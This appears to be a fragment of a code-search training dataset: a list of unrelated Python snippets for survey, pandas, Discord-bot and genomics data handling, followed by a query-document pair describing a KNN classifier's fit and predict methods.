"def choices(self):\n if self.data_type == YES_NO:\n cs = [(YES_CODE, '%s-Yes' % YES_CODE), (NO_CODE, '%s-No' % NO_CODE)]\n else:\n cs = [(fo.code, \"%s-%s\" % (fo.code.lstrip('0'), fo.description))\n for fo in self.factoption_set.all().order_by('code')]\n cs.insert(0, ('', 'Make a selection'))\n return cs",
"def create_sentence_similarity_column(self, user_question):\n log.debug(f'Entering: \"{inspect.currentframe().f_code.co_name}\"')\n self.df['sim'] = ''\n user_question = self.clean_sentence(user_question)\n self.df['sim'] = self.df['clean_title'].swifter.apply(\n self.sentence_similarity,\n args=(user_question,)\n )\n log.debug(f'Leaving: \"{inspect.currentframe().f_code.co_name}\"')",
"def qualitative_field_type(self):\n\n self.fields_type[self.headerIndex] = 'qualitative'\n item_txt = self.fields[self.headerIndex] + \"\\n\" + self.fields_type[self.headerIndex] + \"\\n\"\n item = QtWidgets.QTableWidgetItem(item_txt)\n self.ui.tableWidget.setHorizontalHeaderItem(self.headerIndex, item)",
"def delimited_from_dichotomous(meta, df, name, sniff_single=False):\n \n if sniff_single and df.shape[1]==1:\n # The set has only 1 possible response\n # Convert to single\n series = df.iloc[:,0].replace(0, np.NaN)\n # Replace data file set item\n old_set_item = 'columns@{}'.format(series.name)\n new_set_item = 'columns@{}'.format(name)\n idx = meta['sets']['data file']['items'].index(old_set_item)\n meta['sets']['data file']['items'].insert(idx, new_set_item)\n meta['sets']['data file']['items'].remove(old_set_item)\n # Rename the series\n series.name = name\n # Update type in meta\n meta['columns'][name]['type'] = 'single'\n return meta, series\n \n elif sniff_single and all([v<=1 for v in df.sum(axis=1)]):\n # The set values are mutually exclusive \n # Convert to single\n df = df.copy()\n # Replace data file set item\n old_set_item = 'columns@{}'.format(df.columns[0])\n new_set_item = 'columns@{}'.format(name)\n idx = meta['sets']['data file']['items'].index(old_set_item)\n meta['sets']['data file']['items'].insert(idx, new_set_item)\n for col in df.columns:\n old_set_item = 'columns@{}'.format(col)\n meta['sets']['data file']['items'].remove(old_set_item)\n # Transform the dataframe\n for v, col in enumerate(df.columns, start=1):\n # Convert to categorical set\n df[v] = df[col].replace(1, v)\n del df[col]\n series = df.sum(axis=1).replace(0, np.NaN)\n # Rename the series\n series.name = name\n # Update type in meta\n meta['columns'][name]['type'] = 'single'\n return meta, series\n \n else:\n series = condense_dichotomous_set(\n df, values_from_labels=True, values_regex='^.+r([0-9]+)[c0-9]*$')\n series.name = name\n # Replace data file set item\n old_set_item = 'columns@{}'.format(df.columns[0])\n new_set_item = 'columns@{}'.format(name)\n idx = meta['sets']['data file']['items'].index(old_set_item)\n meta['sets']['data file']['items'].insert(idx, new_set_item)\n for col in df.columns:\n old_set_item = 'columns@{}'.format(col)\n meta['sets']['data file']['items'].remove(old_set_item)\n \n return meta, series",
"def _standardize_column_values(dataframe):\n\n # TODO Use None instead of \"-\"; but may affect downstream pipelines that use \"-\" already\n if \"structure.alternate_model\" in dataframe.columns:\n dataframe[\"structure.alternate_model\"].replace(\"\", \"-\", inplace=True)\n if \"ligand.expo_id\" in dataframe.columns:\n dataframe[\"ligand.expo_id\"].replace(0, \"-\", inplace=True)\n if \"ligand_allosteric.expo_id\" in dataframe.columns:\n dataframe[\"ligand_allosteric.expo_id\"].replace(0, \"-\", inplace=True)\n if \"structure.resolution\" in dataframe.columns:\n dataframe[\"structure.resolution\"].replace(0, np.nan, inplace=True)\n\n # In case of drugs\n if \"drug.brand_name\" in dataframe.columns:\n dataframe[\"drug.brand_name\"] = dataframe[\"drug.brand_name\"].apply(\n lambda x: x.split(\";\") if x != \"\" else []\n )\n if \"drug.synonyms\" in dataframe.columns:\n dataframe[\"drug.synonyms\"] = dataframe[\"drug.synonyms\"].apply(\n lambda x: x.split(\"\\t\") if x != \"\" else []\n )\n\n return dataframe",
"def condense_dichotomous_set(df, values_from_labels=True, sniff_single=False,\n yes=1, no=0, values_regex=None):\n\n # Convert to delimited set\n df_str = df.astype('str')\n for v, col in enumerate(df_str.columns, start=1):\n if values_from_labels:\n if values_regex is None:\n val = col.split('_')[-1]\n else:\n \n try:\n val = get_delimited_value(col, v, as_str=True)\n except AttributeError:\n raise AttributeError(\n \"Your values_regex may have failed to find a match\"\n \" using re.match('{}', '{}')\".format(\n values_regex, col))\n else:\n val = str(val)\n # Convert to categorical set\n df_str[col].replace(\n {\n 'nan': 'nan', \n '{}.0'.format(no): 'nan',\n '{}'.format(no): 'nan'\n }, \n inplace=True\n )\n df_str[col].replace(\n {\n '{}'.format(yes): val, \n '{}.0'.format(yes): val\n }, \n inplace=True\n )\n # Concatenate the rows\n series = df_str.apply(\n lambda x: ';'.join([\n val \n for val in x.tolist() \n if val != 'nan'\n ]),\n axis=1\n )\n \n # Add trailing delimiter\n series = series + ';'\n \n # Use NaNs to represent emtpy\n series.replace(\n {';': np.NaN}, \n inplace=True\n )\n \n if df.dropna().size==0:\n # No responses are known, return filled with NaN\n return series\n \n if sniff_single and df.sum(axis=1).max()==1:\n # Convert to float\n series = series.str.replace(';','').astype('float')\n return series\n \n return series",
"def annotate_value_or_default(self, option_name): \n\n field_name = '_' + option_name\n default_annotation_name = option_name + '_default'\n\n return (self.annotate_defaults(option_name)\n .annotate(**{option_name: functions.Coalesce(field_name, default_annotation_name)}))",
"async def tasks_other(self, ctx):\n try:\n result = sheet.values().get(spreadsheetId=spreadsheet_id, range=\"Other!A2:I\").execute()\n values = result.get(\"values\", [])\n embed = discord.Embed(title=\"RCS Council Other Items\", color=discord.Color.gold())\n for row in values:\n if len(row) < 9:\n if len(row[6]) > 1:\n assigned_to = f\"Assigned to: {self.guild.get_member(int(row[6])).display_name}\"\n else:\n assigned_to = \"Unassigned\"\n embed.add_field(name=f\"Other Comment from {row[1]}\\n{row[7]}\",\n value=f\"{row[3][:1000]}\\n{assigned_to}\\nDated: {row[0]}\",\n inline=False)\n embed.set_footer(text=\"Use ++tasks done <Task ID> to complete a task\")\n if len(embed.fields) > 0:\n await ctx.send(embed=embed)\n else:\n await ctx.send(\"No tasks in the Other category at this time.\")\n except:\n self.bot.logger.exception(\"++tasks other failed\")",
"def sample_custom_query_5():\n return pd.DataFrame({'X': ['d'], 'Numerical': [25]})",
"def clean_gender(dataframe: pd.DataFrame)-> pd.DataFrame:\n genderDistribution = dataframe.loc[:, dataframe.columns.str.contains('gender|Gender', regex=True)]\n nusers = dataframe.index\n dataframe['Gender'] = genderDistribution.apply(lambda row: ' '.join(row.values.astype(str)), axis=1)\n dataframe.loc[dataframe['Gender'].str.contains(\n 'Trans|them|trans|Undecided|Contextual|transgender|nb|unicorn|Unicorn|queer|NB|binary|Enby|Human|little|androgynous|Androgyne|Neutral|Agender|Androgynous|Androgynous|Fluid|GenderFluid|Genderflux|genderqueer|Genderqueer',\n regex=True), 'Gender'] = 'Undecided'\n dataframe.loc[dataframe['Gender'].str.contains(\n 'Female|female|FEMALE|Woman|woman|w|womail|W|Cis female| Female (cis)|Cis Female|cis female|cis woman|F|f',\n regex=True), 'Gender'] = 'Female'\n cond1 = dataframe['Gender'] != 'Female'\n cond2 = dataframe['Gender'] != 'Undecided'\n dataframe.loc[cond1 & cond2, 'Gender'] = 'Male'\n dataframe.drop(genderDistribution, axis=1, inplace=True)\n dataframe.set_index('User_Id', inplace=True)\n\n return dataframe",
"def merge_participants(self):\n participants = self.sp.selected_text2()\n participants['sentiment'] = participants['positive'] + participants['negative']\n # recoded labels\n labels = self.recode()\n # merge\n par_label = participants.merge(labels, on='textID', how='left')\n # replace nan with 0\n par_label = par_label.fillna(0)\n return par_label",
"def data_kinds():\n # Q,actual amount average makes sense / O, order raking them?/ N, category\n \n dic = {}\n dic = {'YEAR': 'O', \n 'MONTH': 'O',\n 'DAY': 'O',\n 'DAY_OF_WEEK': 'N',\n 'AIRLINE': 'N',\n 'FLIGHT_NUMBER':'N',\n 'TAIL_NUMBER': 'N',\n 'ORIGIN_AIRPORT':'N',\n 'DESTINATION_AIRPORT':'N',\n 'SCHEDULED_DEPARTURE': 'Q',\n 'DEPARTURE_TIME': 'Q',\n 'DEPARTURE_DELAY':'Q',\n 'TAXI_OUT': 'Q',\n 'WHEELS_OFF': 'Q' , \n 'SCHEDULED_TIME': 'Q', \n 'ELAPSED_TIME': 'Q', \n 'AIR_TIME':'Q', \n 'DISTANCE' : 'Q',\n 'WHEELS_ON' : 'Q', \n 'TAXI_IN':'Q',\n 'SCHEDULED_ARRIVAL':'Q', \n 'ARRIVAL_TIME':'Q',\n 'ARRIVAL_DELAY':'Q', \n 'DIVERTED': 'N', \n 'CANCELLED':'N', \n 'CANCELLATION_REASON':'N',\n 'AIR_SYSTEM_DELAY':'Q', \n 'SECURITY_DELAY':'Q', \n 'AIRLINE_DELAY':'Q',\n 'LATE_AIRCRAFT_DELAY':'Q', \n 'WEATHER_DELAY':'Q' \n }\n \n\n return dic",
"def get_original_caption_field(value):\n return u' |other_fields_2 = {{Information field' \\\n u'|name={{original caption/i18n|header}}' \\\n u'|value=%s}}\\n' % value",
"def modify_phenos_mt(result_type):\n mt = hl.read_matrix_table(\n f\"{bucket}/{CURRENT_TRANCHE}/results/{'' if result_type=='gene' else 'variant_'}results.mt\"\n )\n mt = drop_pheno_fields_mt(mt)\n mt = mt.filter_cols(\n (mt.n_cases_defined >= 100)\n & ~((mt.phenocode == \"20004\") & ((mt.coding == \"1490\") | (mt.coding == \"1540\")))\n & ~((mt.phenocode == \"Allergy_pfe\") | (mt.phenocode == \"AnyAutoimmune_pfe\"))\n )\n mt = mt.annotate_cols(\n description=hl.case()\n .when(mt.description.matches(\"AbbVie\"), mt.description.replace(\"AbbVie \", \"\"))\n .when(mt.description.matches(\"pfe\"), mt.description.replace(\" \\(pfe\\)\", \"\"))\n .default(mt.description)\n )\n mt = mt.annotate_cols(\n description=hl.if_else(\n mt.phenocode.startswith(\"WBFMadjBMI_\")\n | mt.phenocode.startswith(\"WBfatmass_\"),\n mt.description.replace(\"fat\", \"fat free\"),\n mt.description,\n ),\n description_more=hl.if_else(\n mt.phenocode.startswith(\"WBFMadjBMI_\")\n | mt.phenocode.startswith(\"WBfatmass_\"),\n mt.description_more.replace(\"mass\", \"free mass\"),\n mt.description_more,\n ),\n )\n mt = mt.annotate_cols(\n description=hl.if_else(\n mt.description.matches(\"WBFMadjBMI\"),\n mt.description.replace(\"WBFMadjBMI\", \"WBFFMadjBMI\"),\n mt.description,\n )\n )\n\n import random\n\n random.seed(2022)\n alz_order = [1, 2]\n random.shuffle(alz_order)\n ibd_order = [1, 2]\n random.shuffle(ibd_order)\n\n mt = mt.key_cols_by(\n phenocode=hl.case()\n .when(mt.phenocode == \"AbbVie_Alzheimers\", f\"Alzheimers_custom{alz_order[0]}\")\n .when(mt.phenocode == \"Alzheimers_BI\", f\"Alzheimers_custom{alz_order[1]}\")\n .when(mt.phenocode == \"AbbVie_IBD\", f\"IBD_custom{ibd_order[0]}\")\n .when(mt.phenocode == \"IBD_pfe\", f\"IBD_custom{ibd_order[1]}\")\n .when(\n mt.phenocode.startswith(\"AbbVie_\"),\n mt.phenocode.replace(\"AbbVie_\", \"\") + \"_custom\",\n )\n .when(mt.phenocode.endswith(\"_pfe\"), mt.phenocode.replace(\"_pfe\", \"_custom\"))\n .when(mt.phenocode.endswith(\"_BI\"), mt.phenocode.replace(\"_BI\", \"_custom\"))\n .default(mt.phenocode),\n )\n mt = mt.key_cols_by(\n trait_type=mt.trait_type,\n phenocode=hl.case()\n .when(\n mt.phenocode.startswith(\"WBFMadjBMI_\"),\n mt.phenocode.replace(\"WBFMadjBMI_\", \"WBFFMadjBMI_\"),\n )\n .when(\n mt.phenocode.startswith(\"WBfatmass_\"),\n mt.phenocode.replace(\"WBfatmass_\", \"WBfatfreemass_\"),\n )\n .default(mt.phenocode),\n pheno_sex=mt.pheno_sex,\n coding=mt.coding,\n modifier=hl.if_else(\n hl.set({\"biogen\", \"abbvie\", \"pfizer\"}).contains(mt.modifier),\n \"custom\",\n mt.modifier,\n ),\n )\n return mt"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Stores training points x_train and their corresponding labels w_train, and estimates the a priori probabilities p(w_i) for each class w_i.
|
def fit(self, x_train, w_train):
# Store examples.
self.x_train = x_train
self.w_train = w_train
    # Estimate a priori probabilities p(wi) for each class wi.
self.p_w = DataLoader.compute_a_priori(w_train)
self.num_classes = len(self.p_w)
return self
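
DataLoader.compute_a_priori is not shown here; a minimal sketch of what such a helper could look like, assuming it returns the relative frequency of each class label as a dict (the name and return type are assumptions based on how self.p_w is used above):

import numpy as np

def compute_a_priori(w_train):
    # Estimate p(w_i) as the relative frequency of each class label
    # among the training labels; returns {label: probability}.
    labels, counts = np.unique(w_train, return_counts=True)
    return {label: count / len(w_train) for label, count in zip(labels, counts)}

# Example: three samples of class 0 and one of class 1.
print(compute_a_priori(np.array([0, 0, 0, 1])))   # {0: 0.75, 1: 0.25}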
|
[
"def learn(self, Xtrain, ytrain):\n\n ### YOUR CODE HERE\n if self.params['usecolumnones']:\n self.numfeatures = Xtrain.shape[1]\n \n else:\n self.numfeatures = Xtrain.shape[1] - 1\n\n ### END YOUR CODE\n\n origin_shape = (self.numclasses, self.numfeatures)\n self.means = np.zeros(origin_shape)\n self.stds = np.zeros(origin_shape)\n self.prior_prob = np.zeros(2)\n \n\n ### YOUR CODE HERE\n for clas in range(self.numclasses):\n indices = np.where(ytrain == clas)\n trainclass = Xtrain[indices]\n ## calculating prior probability for each class\n self.prior_prob[clas] = np.size(indices)/(float)(Xtrain.shape[0])\n #print(np.size(indices))\n for i in range(self.numfeatures):\n self.means[clas, i] = np.mean(trainclass[:, i])\n self.stds[clas, i] = np.std(trainclass[:, i])\n \n ### END YOUR CODE\n\n assert self.means.shape == origin_shape\n assert self.stds.shape == origin_shape",
"def train_sequential(self, verbose):\n iteration = 0\n self.int_w = {}\n self.error_history = []\n # take a random batch or sequential batch?\n data = self.train_data\n targets = self.train_targets\n self.predictions = np.empty(len(targets))\n while iteration < self.epochs:\n\n for nd, d in enumerate(data):\n #predict (compute product of X * w)\n self.sum = np.dot(d, self.w) # Y_pred: NxNeurons \"the output will be an NxNeurons matrix of sum for each neuron for each input vector\"\n # compute delta_w\n delta_w = self.learn(d, targets[nd], num_data = nd)\n #update\n self.w = self.w - delta_w.reshape(-1,1)\n\n # compute error\n self.sum = np.dot(data, self.w)\n self.predictions = self.activation_function()\n if self.learning_method == 'perceptron':\n self.error = self.missclass_error(self.predictions, targets)\n else:\n self.error = np.mean((self.sum - targets) ** 2) # mse\n\n self.error_history.append(self.error)\n if self.error <= self.epsilon:\n if (verbose):\n self.print_info(iteration, self.error)\n break\n\n self.int_w[iteration] = self.w\n\n if (verbose):\n self.print_info(iteration, self.error)\n iteration += 1",
"def train(self, training_data: np.ndarray, training_labels: np.ndarray) -> None:\n # before training, make sure the prior list and likelihoods list is empty\n self.__log_class_priors = []\n self.__log_class_conditional_likelihoods = []\n\n if not (training_data is None or training_labels is None):\n self.__estimate_log_class_priors(training_labels)\n self.__estimate_log_class_conditional_likelihoods(training_data, training_labels)",
"def update(self, examples):\n\n batch_X, batch_y = get_prodigy_x_y(examples, self.cat2bin)\n\n if len(batch_X) != 0:\n # Update if the \n self.training_X = self.training_X + batch_X\n self.training_y = self.training_y + batch_y\n\n # Refit with collated old training data with new\n self.vectorizer = TfidfVectorizer(\n analyzer='word',\n token_pattern=r'(?u)\\b\\w+\\b',\n ngram_range=(1, 2)\n )\n train_X_vect = self.vectorizer.fit_transform(self.training_X)\n \n self.model = LogisticRegression(max_iter=1000)\n self.model = self.model.fit(train_X_vect, self.training_y)\n\n new_y_pred = self.model.predict(train_X_vect)\n test_y_pred = self.model.predict(self.vectorizer.transform(self.test_X))\n\n train_f1 = f1_score(self.training_y, new_y_pred, average='weighted')\n self.test_f1 = f1_score(self.test_y, test_y_pred, average='weighted')\n print(f\"Training F1: {round(train_f1, 3)}\")\n print(f\"Test F1: {round(self.test_f1, 3)}\")\n print(\"Train classification report:\")\n print(classification_report(self.training_y, new_y_pred))\n print(\"Test classification report:\")\n print(classification_report(self.test_y, test_y_pred))\n print(\"Test confusion:\")\n print(confusion_matrix(self.test_y, test_y_pred))",
"def train(self, images, labels, load):\n \n PATH='./trained.pickle'\n\n if os.path.isfile(PATH) and load:\n print 'Loading already existing training values from ' + PATH\n with open('trained.pickle') as f:\n self.classes, self.prClass, self.prPixelGivenClass = pickle.load(f)\n else:\n self.prClass = [0 for i in range(10)]\n self.classes = [i for i in range(10)]\n self.prPixelGivenClass = [[0 for i in range(14*14)] for j in range(10)]\n \n for i in range(len(labels)):\n self.prClass[labels[i]] += 1 # Count how many times a class appears in the labels list.\n for j in range(len(images[i])):\n if images[i][j] < 100:\n self.prPixelGivenClass[labels[i]][j] += 1 # For every class, count how many times\n # a pixel is black.\n \n for i in range(len(self.prPixelGivenClass)):\n for j in range(len(self.prPixelGivenClass[i])):\n self.prPixelGivenClass[i][j] /= float(self.prClass[i]) # Divide the count of black pixels\n # by the number of times a class\n # appears, to get a percentage.\n self.prClass[i] /= float(len(images)) # Divide the number of times a class\n # appears, by the total number of classes\n # to get a percentage.\n \n print ''\n for i in range(len(self.prClass)): # some useful output that shows the probability of each class.\n print 'Pr(C=' + str(i) + ') = ' + str(self.prClass[i])[:5]\n # print 'Probabilites of the individual pixel in this class:' \"\"Commented because we now have\n # self.print_ascii_probabilities(self.prPixelGivenClass[i]) \"\"'heat-maps' for each image\n # print''\n print ''\n with open('trained.pickle', 'w') as f:\n pickle.dump([self.classes, self.prClass, self.prPixelGivenClass], f)",
"def train(self):\r\n hidden_size, output_size, num_epochs = self.params[\"h_size\"], \\\r\n self.params[\"o_size\"], self.params[\"num_epochs\"]\r\n \r\n # initialize weights to small random numbers, biases to 0\r\n w1 = np.random.randn(hidden_size, self.X.shape[1])\r\n b1 = np.zeros((hidden_size, 1))\r\n w2 = np.random.randn(output_size, hidden_size)\r\n b2 = np.zeros((output_size, 1))\r\n \r\n for i in range(0, num_epochs):\r\n # do a backprop update\r\n cost, w1, b1, w2, b2 = self.backprop(w1, b1, w2, b2)\r\n \r\n # epoch check and print current cost\r\n if (i % 1 == 0):\r\n print(\"Epoch \", i, \"cost: \", cost)\r\n \r\n self.model = { 'W1': w1, 'b1': b1, 'W2': w2, 'b2': b2}",
"def train(self, X, d):\n for _ in range(self.epochs):\n for i in range(d.shape[0]):\n y = self.predict(X[i])\n e = d[i] - y\n self.W = self.W + self.lr * e * np.insert(X[i], 0, 1)",
"def cnn_predict():\n\n x_test, y_test, file_name_test_list = load_test_set()\n\n model = cnn()\n\n weight_path = Path(config[\"weight_file\"])\n if weight_path.exists() is False:\n log.error(\"Not found weight file %s. Aborting.\" % (weight_path))\n sys.exit(1)\n\n model.load_weights(weight_path)\n\n y_predicted = model.predict(x_test)\n correct_count = 0\n total_count = x_test.shape[0]\n for i in range(total_count):\n # Ground truth\n # Convert the file name to a string that contains only the ground trugh classes\n name = file_name_test_list[i]\n underscore_pos = name.find(\"_\")\n if underscore_pos < 0:\n log.warning(\"Invalid image file name. Missing classification marker for file %s\" % (name))\n continue\n\n classes = name[0:underscore_pos]\n actual = \"\"\n if DogClassMarker.AIMEE in classes:\n actual = actual + DogClassMarker.AIMEE\n if DogClassMarker.MADDIE in classes:\n actual = actual + DogClassMarker.MADDIE\n if DogClassMarker.OLIVIA in classes:\n actual = actual + DogClassMarker.OLIVIA\n if DogClassMarker.PINK in classes:\n actual = actual + DogClassMarker.PINK\n if len(actual) == 0:\n actual = \"_\"\n\n # Prediction\n # Convert the predicted classes contained in the vector to a string.\n # Before conversion, round down or round up values to 0 or 1 except for the mid-range number.\n # A mid-range number is counted as a \"mismatch\".\n v = y_predicted[i]\n\n low_threshold_flag = v < 0.3\n v[low_threshold_flag] = 0\n\n high_threshold_flag = v > 0.7\n v[high_threshold_flag] = 1\n\n predicted = \"\"\n if v[DogClassIndex.AIMEE] == 1:\n predicted = predicted + DogClassMarker.AIMEE\n if v[DogClassIndex.MADDIE] == 1:\n predicted = predicted + DogClassMarker.MADDIE\n if v[DogClassIndex.OLIVIA] == 1:\n predicted = predicted + DogClassMarker.OLIVIA\n if v[DogClassIndex.PINK] == 1:\n predicted = predicted + DogClassMarker.PINK\n if len(predicted) == 0:\n predicted = \"_\"\n\n # Compare the ground-truth classification string and the predicted classification string\n # Count only the complete match as the match. Do not count the partial match.\n if actual == predicted:\n correct_count = correct_count + 1\n\n print(\"Total count: %d\" % (total_count))\n print(\"Correct count (complete match only): %d\" % (correct_count))\n print(\"Accuracy: %f percent\" % (correct_count * 100 / total_count))",
"def _train_all(names, classifiers,\r\n X, y, X_train, X_test, y_train, y_test,\r\n stats=True, predict=\"\"):\r\n ## ignore numpy warnings\r\n from warnings import filterwarnings\r\n filterwarnings('ignore')\r\n ## cycle around each classifier\r\n classes = {1:\"LIKELY\", -1:\"UNLIKELY\"}\r\n score = {1:0, -1:0}\r\n trusts = {}\r\n predictions = {}\r\n for name, classifier in zip(names, classifiers):\r\n ## train each classifier\r\n classifier.fit(X_train, y_train)\r\n if stats == True:\r\n _get_statistics(name, classifier, X, y, X_test, y_test)\r\n if predict != \"\":\r\n ## Make prediction\r\n prediction = classifier.predict(predict)[0]\r\n\r\n ## Increment counter for relevant score\r\n score[prediction] += 1\r\n predictions.update({name:prediction})\r\n \"\"\"\r\n reveal expected true negatives, false positives,\r\n false negatives, true positives\r\n \"\"\"\r\n tn, fp, fn, tp = c_m(y_test, classifier.predict(X_test)).ravel()\r\n ## trust is the amount of time that the prediction was correct\r\n trust_score = tp/(tp + fp) if prediction == 1 else tn/(tn + fn)\r\n trust_score = round((trust_score * 100), 2)\r\n trusts.update({name:trust_score})\r\n if predict != \"\":\r\n scores = pd.DataFrame({'Recurrence':predictions,\r\n 'Confidence':trusts})\r\n pred_weight = scores.Recurrence * scores.Confidence\r\n weights = pd.DataFrame({'Weights':pred_weight})\r\n scores['Recurrence'] = scores['Recurrence'].apply(lambda x: classes[x])\r\n print(scores)\r\n classification = 1 if weights.Weights.mean() > 0 else -1\r\n print(f\"\\nRecurrence judged {classes[classification]} at \\\r\n{round(abs(weights.Weights.mean()),2)} % confidence\")\r\n print(f\"Poll of classifiers results:\")\r\n for index in score:print(f\"{classes[index]}: \\t\\t{score[index]}\")",
"def train(self, train_data, labels, num_epochs, learning_rate):\n\n # initialize Perceptron instance variables, generate random numbers for weights and bias\n self.performance = []\n self.learning_rate = learning_rate\n self.W = [random.uniform(-1, 1) for i in range(train_data.shape[1] + 1)]\n\n epoch = 0\n if num_epochs < 0:\n raise ValueError(\"number of epochs must be non-negative\")\n\n while True:\n errors = self.train_epoch(train_data, labels, epoch)\n if num_epochs == 0 and errors == 0:\n break\n if num_epochs != 0 and epoch >= num_epochs:\n break\n epoch += 1\n\n return self.performance",
"def train( self, trainingData, trainingLabels):\n\n self.features = trainingData[0].keys()\n \"*** YOUR CODE HERE ***\"\n m = len(trainingData)\n n = int(self.ratio*m)\n trainingDataset = []\n trainingLabelsDataset = []\n\n for i in range(self.num_classifiers):\n trainingDataset.append([])\n trainingLabelsDataset.append([])\n for j in range(n):\n choice = random.choice(range(m))\n trainingDataset[i].append(trainingData[choice])\n trainingLabelsDataset[i].append(trainingLabels[choice])\n\n for i in range(self.num_classifiers):\n self.classifiers[i].train(trainingDataset[i], trainingLabelsDataset[i])\n # util.raiseNotDefined()",
"def fit(self):\n # if self.verbose == 1:\n # print ('The list of all perturbation with its probability: \\n')\n # for perturb in range(len(self.p_list)):\n # print('%s perturbation with probability of: %s \\n' %(self.p_list[perturb], self.p_prob[perturb]))\n #p_current, error_vec_current ,error_vec_normal_current = self.minus_log_prob_neuron(self.neuron) # log probability of the current neuron\n p_current, error_vec_current ,error_vec_normal_current = self.kl_distance(self.neuron) # log probability of the current neuron\n acc = 0\n for i in range(self.ite):\n if(self.verbose ==1):\n #p_current, er , error_vec_normal_current = self.minus_log_prob_neuron(self.neuron)\n p_current, er , error_vec_normal_current = self.kl_distance(self.neuron)\n #print('feature of current is: \\n %s' %(self.neuron.features)+ '\\n')\n print('\\n and its probability is: %s' %p_current)\n per = self.select_proposal() # MCMC index\n p_sym, details = self.do_MCMC(per)\n #p_proposal, error_vec_proposal, error_vec_normal_proposal = self.minus_log_prob_neuron(self.neuron)\n p_proposal, error_vec_proposal, error_vec_normal_proposal = self.kl_distance(self.neuron)\n if(self.verbose ==1):\n #print('feature of proposal is: \\n %s' %(self.neuron.features))\n print('\\n and its probability is: %s' %p_proposal)\n a = min(1, p_sym * np.exp(p_current - p_proposal)) # Metropolis choice, notice that the values are minus log probability\n B = self.accept_proposal(a) # the boolean of acceptance\n if(B):\n p_current = p_proposal\n error_vec_current = error_vec_proposal\n error_vec_normal_current = error_vec_normal_proposal\n self.trend[:,i] = error_vec_proposal\n self.trend_normal[:,i] = error_vec_normal_proposal\n acc = acc + 1\n else:\n self.undo_MCMC(per, details)\n self.trend[:,i] = error_vec_current\n self.trend_normal[:,i] = error_vec_normal_current\n if len(self.neuron.nodes_list) == self.neuron.n_soma:\n self.neuron = self.initial_neuron(int(self.n_node/self.initial_seg),self.initial_seg)\n #p_current, error_vec_current, error_vec_normal_current = self.minus_log_prob_neuron(self.neuron)\n p_current, error_vec_current, error_vec_normal_current = self.kl_distance(self.neuron)\n if(self.verbose ==1):\n print ('\\n')\n print('Selected perturbation = ' + per)\n print('the p of acceptance was %s and it was %s that it`s been accepted.'%(a,B))\n print ('\\n')\n if(np.remainder(i,100)==0):\n self.evo.append(deepcopy(self.neuron))\n self.neuron.set_nodes_values()\n print acc",
"def train(self, examples): \r\n self.fitted = False\r\n for case in examples:\r\n if(len(case) < len(self.attrs) + 1):\r\n raise f\"Example {case} is malformed\"\r\n\r\n klass = case[-1]\r\n attributes = np.array(case[:-1])\r\n\r\n if klass not in self.classified:\r\n self.classified[klass] = np.zeros(len(attributes))\r\n self.counts[klass] = 0\r\n \r\n self.classified[klass] += attributes\r\n self.counts[klass] += 1\r\n self.n_examples += len(examples)",
"def train(self, train_data):\n\n clustlab_tr = self.clust_method.fit_predict(train_data) # A_k(X)\n fitclass_tr = self.class_method.fit(train_data, clustlab_tr)\n classlab_tr = fitclass_tr.predict(train_data)\n misclass = zero_one_loss(clustlab_tr, classlab_tr)\n return misclass, fitclass_tr, clustlab_tr",
"def learn(self, Xtrain, ytrain):\n Ktrain = None\n\n ### YOUR CODE HERE\n #Creating centers and sending to kernel\n \n self.n = Xtrain[0:self.num_of_center]\n Ktrain = self.kernel(Xtrain, self.n)\n ### END YOUR CODE\n\n self.weights = np.zeros(Ktrain.shape[1],)\n\n ### YOUR CODE HERE\n for i in range(self.iteration):\n self.weights -= (self.learning_rate / (i+1)) * self.kernel_logit_cost_grad(self.weights, Ktrain, ytrain)\n #print(\"Loss: \"+str(self.kernel_logit_cost(self.weights, Ktrain, ytrain)))\n ### END YOUR CODE\n\n self.transformed = Ktrain # Don't delete this line. It's for evaluation.",
"def generate_train(self):\n if not hasattr(self, 'users_products_count_rdcd'):\n self.users_products_count_rdcd = load_pickle(prepr.data_sources[\"users_products_count_rdcd\"])\n X_train = self.users_products_count_rdcd.loc[(self.users_products_count_rdcd['eval_set'] == 'train') & self.users_products_count_rdcd['user_id'].isin(self.users_for_train)]\n y_train = self.users_products_count_rdcd.loc[(self.users_products_count_rdcd['eval_set'] == 'test') & self.users_products_count_rdcd['user_id'].isin(self.users_for_train)]\n pickle.dump(X_train, open(\"../pickles/X_train.p\", \"wb\"))\n pickle.dump(y_train, open(\"../pickles/y_train.p\", \"wb\"))",
"def train(self, training_examples, labels):\r\n\r\n # go through the training examples and count the occurences\r\n for training_example, label in zip(training_examples, labels):\r\n self.learn(training_example, label)",
"def forward_prop(self,X_data): # Computes the forward propagation on all training examples\n W=self.W\n X=X_data\n b=self.b\n self.Z=np.dot(W.T,X)+b # computes Z=np.dot(W.T,X)+b\n self.A=self.sigmoid(self.Z) # computes A=sigmoid(Z)",
"def _pre_training(self):\n print(\"\\nLayer pre-training started. \\n\")\n self.U_s = []\n self.V_s = []\n for i in tqdm(range(self.p), desc=\"Layers trained: \", leave=True):\n self._setup_z(i)\n U, V = self._sklearn_pretrain(i)\n self.U_s.append(U)\n self.V_s.append(V)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Runs KNN prediction/estimation for each point x in x_set. Returns an array containing the predicted classes for each input point.
|
def predict(self, x_set):
def classify(x):
# Pick top-voted label among the k nearest neighbors.
label_votes = self.knn_label_votes(x)
return max(label_votes, key=label_votes.get)
return np.array(list(map(classify, x_set)))
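
knn_label_votes is defined elsewhere on the class; a minimal sketch of the idea as a standalone function, assuming Euclidean distance and that x_train, w_train and k come from fit (all assumptions, not the original implementation):

from collections import Counter

import numpy as np

def knn_label_votes(x, x_train, w_train, k):
    # Count how often each class label occurs among the k training
    # points closest to x (Euclidean distance).
    distances = np.linalg.norm(x_train - x, axis=1)
    nearest = np.argsort(distances)[:k]
    return Counter(w_train[nearest])

# Example: two clusters on a line; the query point 0.9 lies near class 1.
x_train = np.array([[0.0], [0.1], [1.0], [1.1]])
w_train = np.array([0, 0, 1, 1])
votes = knn_label_votes(np.array([0.9]), x_train, w_train, k=3)
print(max(votes, key=votes.get))   # 1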
|
[
